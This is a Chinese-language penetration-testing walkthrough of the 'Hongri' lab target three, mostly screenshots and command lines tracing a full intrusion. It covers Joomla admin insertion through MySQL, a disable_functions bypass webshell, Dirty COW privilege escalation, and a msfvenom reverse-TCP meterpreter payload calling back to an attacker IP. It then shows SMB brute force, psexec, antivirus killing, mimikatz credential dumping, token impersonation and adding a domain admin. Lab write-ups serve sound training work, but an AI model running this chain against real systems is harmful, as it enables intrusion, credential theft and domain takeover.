红日靶机三
信息收集
![](https://upload-images.jianshu.io/upload_images/4664072-8b58b8de1f26bc7f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-90f93f786401fc6d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-34c62969b9e8d286.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-eb2f9707f69fe41e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-5741ec1357744d09.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-62012cc49fa91736.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-e6c382841dda86df.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
testuser / cvcvgjASD!@
![](https://upload-images.jianshu.io/upload_images/4664072-8a11ec9bd0ccd98e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-88eeae45c2ba43a4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
爆破失败
![](https://upload-images.jianshu.io/upload_images/4664072-05f72340a2387dfd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
登录数据成功
![](https://upload-images.jianshu.io/upload_images/4664072-a45efd4b547948fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-f311547b69f55312.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ba8285fc559502b1.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
joomlaCMS公开漏洞
![](https://upload-images.jianshu.io/upload_images/4664072-d9615df00a60e2b8.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-a687b305cface44e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
mysql -uroot -p123 -h 192.168.1.110
INSERT INTO `am2zu_users`(`name`, `username`, `password`, `params`, `registerDate`, `lastvisitDate`, `lastResetTime`)VALUES ('Administrator2', 'admin2','d2064d358136996bd22421584a7cb33e:trd7TvKHx6dMeoMmBVxYmg0vuXEA4199', '', NOW(), NOW(), NOW());
INSERT INTO `am2zu_user_usergroup_map` (`user_id`,`group_id`) VALUES (LAST_INSERT_ID(),'8');
![](https://upload-images.jianshu.io/upload_images/4664072-b80c61d5818cf981.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7894704650698991.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
账号密码admin2:secret
登陆成功
![](https://upload-images.jianshu.io/upload_images/4664072-66de266e14051082.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-1aa5aa0b8afe817d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-59ef28a74a16b257.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-d850824fe9c9e2bb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6f4dcdc91a7eedf9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
开启了disable_functions
![](https://upload-images.jianshu.io/upload_images/4664072-68d7234fbb77caa6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-6642ef65123b2a1f.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
https://github.com/yangyangwithgnu/bypass_disablefunc_via_LD_PRELOAD
进行文件上传
![](https://upload-images.jianshu.io/upload_images/4664072-6d915fdad40c6407.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=whoami&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
![](https://upload-images.jianshu.io/upload_images/4664072-62cd7fe00fe14856.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
http://192.168.1.110/templates/beez3/bypass_disablefunc.php?cmd=ifconfig&outpath=/tmp/panda&sopath=/var/www/html/templates/beez3/bypass_disablefunc_x64.so
![](https://upload-images.jianshu.io/upload_images/4664072-79b0ac72132ed0d6.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-64249971994ea30b.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-3381f2729d4495a2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
adduser wwwuser
passwd wwwuser_123Aqx
远程登录
![](https://upload-images.jianshu.io/upload_images/4664072-26d5f171be4e0445.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
文件上传
![](https://upload-images.jianshu.io/upload_images/4664072-297e8532a419739d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
[wwwuser@localhost tmp]$ chmod 777 linux-exploit-suggester.sh
[wwwuser@localhost tmp]$ ./linux-exploit-suggester.sh
![](https://upload-images.jianshu.io/upload_images/4664072-f1df3e1ece39abea.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
根据版本
本地下载 文件上传
![](https://upload-images.jianshu.io/upload_images/4664072-8bb938a212aedb45.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
gcc -pthread 40839.c -o dirty -lcrypt
[wwwuser@localhost tmp]$ chmod 777 dirty
[wwwuser@localhost tmp]$ rm -rf passwd.bak
[wwwuser@localhost tmp]$ ./dirty 123.com
[wwwuser@localhost tmp]$mv /tmp/passwd.bak /etc/passwd
![](https://upload-images.jianshu.io/upload_images/4664072-d990b3e48dcafbb4.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
su firefart 123.com
msfvenom -p linux/x86/meterpreter/reverse_tcp lhost=192.168.1.128 lport=441 -f elf > 1.elf
![](https://upload-images.jianshu.io/upload_images/4664072-1fbc1cf545c64bd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set payload linux/x86/meterpreter/reverse_tcp
msf5 exploit(multi/handler) > set lhost 192.168.1.128
msf5 exploit(multi/handler) > set lport 441
msf5 exploit(multi/handler) > run
![](https://upload-images.jianshu.io/upload_images/4664072-07b8a3729cf99adb.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run autoroute -s 192.168.93.0/24
run autoroute -p
![](https://upload-images.jianshu.io/upload_images/4664072-0e24da2b853eb5c3.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
主机探测
use auxiliary/scanner/discovery/arp_sweep
set rhosts 192.168.93.1/24
set threads 10
run
![](https://upload-images.jianshu.io/upload_images/4664072-ed98e510737c07ab.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
msf5 auxiliary(scanner/discovery/arp_sweep) > use auxiliary/scanner/smb/smb_version
msf5 auxiliary(scanner/smb/smb_version) > set rhosts 192.168.93.1/24
msf5 auxiliary(scanner/smb/smb_version) > run
![](https://upload-images.jianshu.io/upload_images/4664072-ae25a2072547886e.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-adc1e8f9b0f9da27.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
爆破密码
![](https://upload-images.jianshu.io/upload_images/4664072-7e0cffebe10232e9.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-ce658e59b4b11ff5.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
登录20
msf5 auxiliary(scanner/smb/smb_login) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/meterpreter/bind_tcp
payload => windows/meterpreter/bind_tcp
msf5 exploit(windows/smb/psexec) > set rhost 192.168.93.20
rhost => 192.168.93.20
msf5 exploit(windows/smb/psexec) > set smbuser administrator
smbuser => administrator
msf5 exploit(windows/smb/psexec) > set smbpass 123qwe!ASD
smbpass => 123qwe!ASD
msf5 exploit(windows/smb/psexec) > run
![](https://upload-images.jianshu.io/upload_images/4664072-08fbaa33021fce2d.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-7de88a5ad4674b04.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
查看进程
![](https://upload-images.jianshu.io/upload_images/4664072-d5ab085f7b52f799.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
迁移进程
getpid
run post/windows/manage/migrate
![](https://upload-images.jianshu.io/upload_images/4664072-8b9daf619351440a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用sysinfo命令查看目标机的系统信息
![](https://upload-images.jianshu.io/upload_images/4664072-7242351e0a4a1e3a.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
route命令查看完整的网络设置
![](https://upload-images.jianshu.io/upload_images/4664072-8b093612940f1ae0.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run post/windows/manage/killav命令关闭系统杀毒软件
run post/windows/gather/enum_logged_on_users列举当前登录靶机用户
![](https://upload-images.jianshu.io/upload_images/4664072-75169cae6501cf39.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
run post/windows/gather/enum_applications列举安装在系统上的应用程序
![](https://upload-images.jianshu.io/upload_images/4664072-7776ef2702c8df50.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
使用run windows/gather/credentials/windows_autologin抓取自动登录的用户名和密码
![](https://upload-images.jianshu.io/upload_images/4664072-403c96bed73ab8b2.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
load mimikatz
kerberos
msv
![](https://upload-images.jianshu.io/upload_images/4664072-f5042795ea773fd7.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
use incognito #help incognito 查看帮助
list_tokens -u #查看可用的token
impersonate_token 'NT AUTHORITY\SYSTEM' #假冒SYSTEM token
或者impersonate_token NT\ AUTHORITY\\SYSTEM #不加单引号 需使用\\
execute -f cmd.exe -i –t # -t 使用假冒的token 执行
或者直接shell
rev2self #返回原始token
![](https://upload-images.jianshu.io/upload_images/4664072-2e5009b4d805a200.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
发现TEST\administrator为域控管理员账号
![](https://upload-images.jianshu.io/upload_images/4664072-9b4c465640775837.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
添加账户
meterpreter > rev2self
meterpreter > add_user bing 1234.com -h 192.168.93.10
meterpreter > add_group_user "Domain Admins" bing -h 192.168.93.10
![](https://upload-images.jianshu.io/upload_images/4664072-7961501a99df3f61.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
net use \\192.168.93.10\ipc$ 1234.com /user:TEST\bing
dir \\192.168.93.10\c$
![](https://upload-images.jianshu.io/upload_images/4664072-abaac8ac35959615.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
![](https://upload-images.jianshu.io/upload_images/4664072-19948213270194fd.png?imageMogr2/auto-orient/strip%7CimageView2/2/w/1240)
参考文章
http://yugod.xmutsec.com/index.php/2020/07/23/90.html
https://www.cnblogs.com/Yang34/p/11407274.html
https://www.jianshu.com/p/dc7f42ef056f
https://xz.aliyun.com/t/2536
https://www.jianshu.com/p/df72d1ee1e3e